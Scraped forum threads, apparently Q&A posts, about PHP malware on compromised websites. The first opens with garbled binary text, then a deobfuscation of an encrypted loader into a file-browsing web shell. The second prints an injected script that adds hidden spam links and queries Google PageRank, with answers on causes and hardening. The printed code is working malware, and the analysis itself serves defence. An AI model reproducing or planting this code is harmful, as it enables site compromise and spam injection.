o $op;�&importa*pi` _" methopost"�� onsubmit="retur$n valid.V�rF (t�his.id)"table�# if(dVers Mayor(��_PS_VERSION_, '1��.5.0')) { $ti��endas = $db->Get�Rows("SELECT _s�hop,�name FROM "�._DB_PREFIX_." �AS s ORDER BYAS8�C"tr>
<td>Tr</�$
�c sizepof(
%) > 1`q <sVelect d
"2i�%Tr��equerido" title=q"#opt�Auto ">�l[TODAS]</
"0ea.�ch 0
Eprintf("<\"%u\">%sv\n",I ['']H']r}#?~/�#�2 QelseP#1t3rs[0]0 ech+C['c�2<input typhidden"+A+
;" 9/>C !�p#A8 #<$Nombred%Ztex6�$="30"�""
$�p 1$ABvo0-
radiɗ(pq="Eve�1"""� o d blabel for1"> Sí</AH0D�/>k<b 0�N#�p]%ce��nter" colspan="27tbr PPS6Aceptaaboto(�#;`)'_SESO[�O'control'/?> T^P�p/VF/ m<RLWSJi�sset($_POST4) &&| <B09 $data9pfes�_prepararDatos4)9Q ^QLy(build�_Inser , Yuppli)8_A $8taux _S_idra� _langarray(8pJ'=>,$aopfigMbM 'descriWb''q a_.Lkeywords|_ { (
")
`uu!t`"hxoq == ^'i2'#o(gt]5shIN�vSERT INTO|NTtR( ,�uR) VALUES(%u, %?u)kq$kHB[`]iqis_numyc.4"s*q?t?w$
?? ,. c%Msg('S(e cdo Xp<- 'c'_� 0
5`dujo alg�+ún error Qno'f~#FGEH#deN`H4" =_#GPG1AExistHi|d `F'sF"DTE F" WHERE'r
0'O{
}'9#�>;_!H#$>>`9"$QY*B"' elimin'_'V7e'_'Pa' '-! Џh4؉uale r^ 3/javacfun`on E
SrV<#){yP$Pdrrm�('¿u Id.'+id+'?')R w�ow.locaTpU /Q$Gp݄;&6�=; }
�0</
#> Rl3ath>4xhs:��<$r$#;R,2,ivLe8_.8$nPsA)2hf�19 g'q% �!i/E` ac#D2 f� �'<a =""e" href="Yj'F:&'.].'p'.7I( (lete.png
P16, ��false, true).'</a>'617e /V8pveed8orߜglobal $�d62`\ � switJcase '&':[$#]trim($3qak�c3 ? '1' : '0'Q=defaultunQc E$ahor1e('Y-m�-d H:i:sp!a['�`e_add'cж#upreturn �M
This is where I'm stuck. How else could this be encoded or compressed?

To decode it, I have removed exit from middle of function, then changed eval to print. Here are the results (code under the eval):
?><div class="derecha mini">explorer v.0.0.4</div>
<h3>Explorer</h3>
<?php
PIGUI::CheckInc();
flush();
if (isset($_GET['loc'])) {
$dir = $_GET['loc'];
if (is_file($dir)) {
$dir = dirname($dir);
$file = basename($dir);
} else {
$file = '';
}
} else {
$dir = getcwd();
$file = '';
}
$dir = ponerBarra($dir);
echo $dir . '<br /><br />';
$dirs = array();
$files = array();
$arr = scandir($dir ? $dir : '.');
sort($arr);
foreach ($arr as $item) {
if ($item != '.') {
if (is_dir($dir . $item)) {
$dirs[] = $item;
} else {
$files[] = $item;
}
}
}
foreach ($dirs as $subdir) {
printf('<img src="%s" alt="" class="middle" /> %s <span class="mini">(%s)</span><br />', $pi_importador, $subdir == '..' ? dirname($dir) : $dir . PIGUI::HtmlEntities($subdir), PIGUI::Icon('folder.png', 16, true, true), $subdir, substr(sprintf('%o', fileperms($dir . $subdir)), -4));
flush();
}
foreach ($files as $file) {
printf('<img src="%s" alt="" class="middle" /> %s <span class="mini">(%s) %.2f Kb</span><br />', PIGUI::Icon('page.png', 16, true, true), $file, substr(sprintf('%o', fileperms($dir . $file)), -4), filesize($dir . $file) / 1024);
flush();
}
?>
EDIT: Here's your original code, mostly deobfuscated. Unfortunately, I don't recognize encryption algorithm:
<?php
function decrypt($source)
{
$file = file_get_contents(__FILE__);
$match = 0;
preg_match("/(print|sprint|echo)/", $file, $match);
// protection against deobfuscation:
// if this file was modified to contain "print", exit
if (count($match)) exit;
$source = base64_decode($source);
$y = (ord($source[1]) << 8) + ord($source[2]);
$z = 0;
$w = 16;
$decrypted = "";
$source_len = strlen($source);
for ($char_no = 3; $char_no < $source_len; ) {
if ($w == 0) {
$y = (ord($source[$char_no++]) << 8);
$y += ord($source[$char_no++]);
$w = 16;
}
if ($y & 0x8000) {
$t = (ord($source[$char_no++]) << 4);
$t += (ord($source[$char_no]) >> 4);
if ($t) {
$x = (ord($source[$char_no++]) & 0x0F) + 3;
for ($i = 0; $i < $x; $i++)
$decrypted[$z + $i] = $decrypted[$z - $t + $i];
$z += $x;
} else {
$x = (ord($source[$char_no++]) << 8);
$x += ord($source[$char_no++]) + 16;
for ($i = 0; $i < $x; )
$decrypted[$z + $i++] = $source[$char_no];
$char_no++;
$z += $x;
}
} else {
$decrypted[$z++] = $source[$char_no++];
}
$y <<= 1;
$w--;
}
return "?" . ">" . implode("", $decrypted);
}
print (decrypt("QAAAPGRpdiBjbGFzcz0iZGVyZQAAY2hhIG1pbmkiPmV4cGxvcgIgZXIgdi4wACA0PC8CsD4NCjxoEwAzPkUBxDwvANABMD9waHAgIFBJAABHVUk6OkNoZWNrSW5jKCk7QQAgABBmbHVzaADEaWYoaXNzZXQAACgkX0dFVFsnbG9jJ10pKSAgNCB7ApAkZGlyID0gAbkEEiADYl9mDxtpbGUoAkEDAQMZA3BuYW0BxAMhJAKxBKAKHGJhc2UBq30GcGVsc2UAcAciApQnJ/4HA3EB0AAwAfMB4gWQBGBnZXRjd2QMEwWlAxKYAQLQICAJEQJQcG9uZXJCYXJyYQozqAcFASAU0G8CEi4nPGJyIC8+AGMG0gGCbjBzA6ADQXkF4gXSATsgICQCAAJgc2NhbsQRCPAF0iA/IAdiOiAnLicWQXNvchUg0IACkADRZhtAYWNoKAOSYXMgJGl0ZVjYbRYjCRSQAPIgIT0DwhBwCQ6hAYBpc1+x/gYFLgJCFmpzW10IUAGCDaEPoRKDGIMUcQI/CcyMAnAAMCAgCTYGIHMgCUFzdWIAwAlkcHIAAGludGYoJzxhIGhyZWY9ImkEIG5kZXguJTA/b3A9KHUmYW1wOxAHaW1wDsBhZG9yPSVzJmEBICQgALAAACI+PGltZyBzcmM9IiVzIiACAmFsdD0iIi2FbWlkZGxlIhgRLwAYYT4gJXMgPHNwYW4B9y7xKCVzGBwpPC8BgRp1LCAkcGlfBzcBAAuDID2coBPxLicYkAxgJicgOhmSLjCESHRtbEUASG50aXRpZXMoJAOzKSwyZUljbwIAbignZm9sN2AucG5nJywgMTYDkCwgdHJ1ZQBjArADVCwgA9BzdHIoTDVzErUlbwLwF2FwZXJtBdAIcC4C1CkDgBf7LTQpILEJN7cYiwOhGJMAoRh9FK8Urz4Ub0NSgHAUYSAlLjJmIEtiFO0RdA+TcGFnZfzID38P0AvwMJIPXw9fci4Csg80LCAM4XNpesBAQLMBxCAvIDEwMjQRDz8+"));
?>

Seems like the original poster wants to see what damage was done to their site after being infected. Valid to ask how to deobfuscate the mess. The whole code is PHP malware. Most likely injected onto a PHP-based website. The whole odd function filled with base64 stuff is the payload. And the weird jumping through hoops is the way the original coder decided to obscure their code. If you truly want to see the output, look at the function at the beginning & the eval at the end: The main function is given the has/odd/garbage name TC9A16C47DA8EEE87. Knowing that, then that last line that should be changed to:
echo TC9A16C47DA8EEE87("QAAAPGRpdiBjbGFzcz0iZGVyZQAAY2hhIG1pbmkiPmV4cGxvcgIgZXIgdi4wACA0PC8CsD4NCjxoEwAzPkUBxDwvANABMD9waHAgIFBJAABHVUk6OkNoZWNrSW5jKCk7QQAgABBmbHVzaADEaWYoaXNzZXQAACgkX0dFVFsnbG9jJ10pKSAgNCB7ApAkZGlyID0gAbkEEiADYl9mDxtpbGUoAkEDAQMZA3BuYW0BxAMhJAKxBKAKHGJhc2UBq30GcGVsc2UAcAciApQnJ/4HA3EB0AAwAfMB4gWQBGBnZXRjd2QMEwWlAxKYAQLQICAJEQJQcG9uZXJCYXJyYQozqAcFASAU0G8CEi4nPGJyIC8+AGMG0gGCbjBzA6ADQXkF4gXSATsgICQCAAJgc2NhbsQRCPAF0iA/IAdiOiAnLicWQXNvchUg0IACkADRZhtAYWNoKAOSYXMgJGl0ZVjYbRYjCRSQAPIgIT0DwhBwCQ6hAYBpc1+x/gYFLgJCFmpzW10IUAGCDaEPoRKDGIMUcQI/CcyMAnAAMCAgCTYGIHMgCUFzdWIAwAlkcHIAAGludGYoJzxhIGhyZWY9ImkEIG5kZXguJTA/b3A9KHUmYW1wOxAHaW1wDsBhZG9yPSVzJmEBICQgALAAACI+PGltZyBzcmM9IiVzIiACAmFsdD0iIi2FbWlkZGxlIhgRLwAYYT4gJXMgPHNwYW4B9y7xKCVzGBwpPC8BgRp1LCAkcGlfBzcBAAuDID2coBPxLicYkAxgJicgOhmSLjCESHRtbEUASG50aXRpZXMoJAOzKSwyZUljbwIAbignZm9sN2AucG5nJywgMTYDkCwgdHJ1ZQBjArADVCwgA9BzdHIoTDVzErUlbwLwF2FwZXJtBdAIcC4C1CkDgBf7LTQpILEJN7cYiwOhGJMAoRh9FK8Urz4Ub0NSgHAUYSAlLjJmIEtiFO0RdA+TcGFnZfzID38P0AvwMJIPXw9fci4Csg80LCAM4XNpesBAQLMBxCAvIDEwMjQRDz8+");
And that will give you the pure base64 of the payload. Past that, not too clear. Maybe further base64 decode? I have faced B.S. like this before & it’s never pleasant. If you are truly fearful, decode this on a safe machine that you don't mind getting hosed in the process. But my guess is this is mainly just a vandalism piece of malware & not something that is mining for secrets deeper than how to cause basic vandalism.

It's not really important to understand the cryptic transformations in the TC9A16C47DA8EEE87. The purpose of this method is to generate executable PHP code from an input string (base64 encoded) that is then passed to eval.
Instead of trying to decode the input string, you could try to just print the return value of TC9A16C47DA8EEE87("QAAAPGRpdiBjbGFzcz..., by using echo instead of eval.

my site got defaced. how to protect myself on shared hosting?

i have godaddy shared hosting and the site got defaced. whose at fault? the site is created with php is it possible the person can get in through some vunerability on my site and modify a file? or is that all through server side being that godaddy wasnt secure enough?
this is what was injected in a file. what does it do?
<?php
//{{1311051f
GLOBAL $alreadyxxx;
if($alreadyxxx != 1)
{
$alreadyxxx = 1;
$olderrxxx=error_reporting(0);
function outputxxx_callback($str)
{
$links = '<SPAN STYLE="font-style: normal; visibility: hidden; position: absolute; left: 0px; top: 0px;"><div id="rb4d41ca36473534443c002805">blow jobs teen<br></div></SPAN>';
preg_match("|</body>|si",$str,$arr);
return str_replace($arr[0],$links.$arr[0],$str);
}
function StrToNum($Str, $Check, $Magic)
{
$Int32Unit = 4294967296;
$length = strlen($Str);
for ($i = 0; $i < $length; $i++) {
$Check *= $Magic;
if ($Check >= $Int32Unit) {
$Check = ($Check - $Int32Unit * (int) ($Check / $Int32Unit));
$Check = ($Check < -2147483648) ? ($Check + $Int32Unit) : $Check;
}
$Check += ord($Str{$i});
}
return $Check;
}
function HashURL($String)
{
$Check1 = StrToNum($String, 0x1505, 0x21);
$Check2 = StrToNum($String, 0, 0x1003F);
$Check1 >>= 2;
$Check1 = (($Check1 >> 4) & 0x3FFFFC0 ) | ($Check1 & 0x3F);
$Check1 = (($Check1 >> 4) & 0x3FFC00 ) | ($Check1 & 0x3FF);
$Check1 = (($Check1 >> 4) & 0x3C000 ) | ($Check1 & 0x3FFF);
$T1 = (((($Check1 & 0x3C0) << 4) | ($Check1 & 0x3C)) <<2 ) | ($Check2 & 0xF0F );
$T2 = (((($Check1 & 0xFFFFC000) << 4) | ($Check1 & 0x3C00)) << 0xA) | ($Check2 & 0xF0F0000 );
return ($T1 | $T2);
}
function CheckHash($Hashnum)
{
$CheckByte = 0;
$Flag = 0;
$HashStr = sprintf('%u', $Hashnum) ;
$length = strlen($HashStr);
for ($i = $length-1; $i >= 0; $i--) {
$Re = $HashStr{$i};
if (1 === ($Flag % 2)) {
$Re += $Re;
$Re = (int)($Re / 10) + ($Re % 10);
}
$CheckByte += $Re;
$Flag ++;
}
$CheckByte %= 10;
if (0 !== $CheckByte) {
$CheckByte = 10 - $CheckByte;
if (1 === ($Flag % 2) ) {
if (1 === ($CheckByte % 2)) {
$CheckByte += 9;
}
$CheckByte >>= 1;
}
}
return '7'.$CheckByte.$HashStr;
}
function getpr($url)
{
$ch = CheckHash(HashURL($url));
$file = "http://toolbarqueries.google.com/search?client=navclient-auto&ch=$ch&features=Rank&q=info:$url";;
$data = file_get_contents($file);
$pos = strpos($data, "Rank_");
if($pos === false){return -1;} else{
$pr=substr($data, $pos + 9);
$pr=trim($pr);
$pr=str_replace("
",'',$pr);
return $pr;
}
}
if(isset($_POST['xxxprch']))
{
echo getpr($_POST['xxxprch']);
exit();
}
else
ob_start('outputxxx_callback');
error_reporting($olderrxxx);
}
//}}75671d8f
?>

Chances are it was an exploit from a package you use on your site (such as phpBB, phpNuke, etc.) people crawl the web looking for the vulnerable hosts and exploit the ones they can. The code is open-source and readily available so there's not much you can do for protection other than use the latest version.
Companies like PacketStormSecurity make it easy for "skript kiddies" to find a PoC (Proof of Concept) script and they take it upon themselves to try it on every site they can. Some are as easy as a crafted google query to find a list of potential targets.
You may be able to look through your logs for a GET url that resulted in the exploit, but best-case scenario is just stay as up-to-date as possible, and never rely on your host to make restore-able backups of your site.

The real deal to this hack is here: http://frazierit.com/blog/?p=103
No SQL injection, no secret sauce, these guys were listening to the wire, or there is an agent on some machine that you use passing keystrokes their way, and you were using a clear text password FTP to work with your site. They gained FTP access to your site, and systematically injected code into .php and .html pages on your site. They are building/have built a distributed network of page ranking testers via numerous ISPs. Probably to validate SEO operations. Easy to clean, just need to go some command line regex work.
-Drew

The script allows someone to specify a URL to the script using the variable xxxprch. It checks the hash of the URL to make sure it conforms to some standard and searches google for the URL. It then checks to see if there is the word "rank_" in the search results and gets the next 9 characters following "rank_" and returns them to be displayed on the user screen.
If the user didn't specify a variable in xxxprch then it automatically writes out to the page links to a sexually explicit website.
Note: If you get a Virtual Private Server (can be found for as cheap as $3 a month), you can install mod_security which prevents a lot of these types of attacks. On the other hand you would then need to keep the OS up to date.

I hate to say this but you are at fault. SQL/HTML/JS/code injection is your responsibility to handle. Also choosing a strong password is critical. It is totally possible for anyone to find a vulnerability and do anything.
It looks like that code is injecting links and somehow getting the Google page rank for some reason.
I think it falls under one of the Pragmatic Programmer's principles:
``select’’ Isn’t Broken It is rare to
find a bug in the OS or the compiler,
or even a third-party product or
library. The bug is most likely in the
application.
Replace OS/compiler/3rd-party library with shared hosting.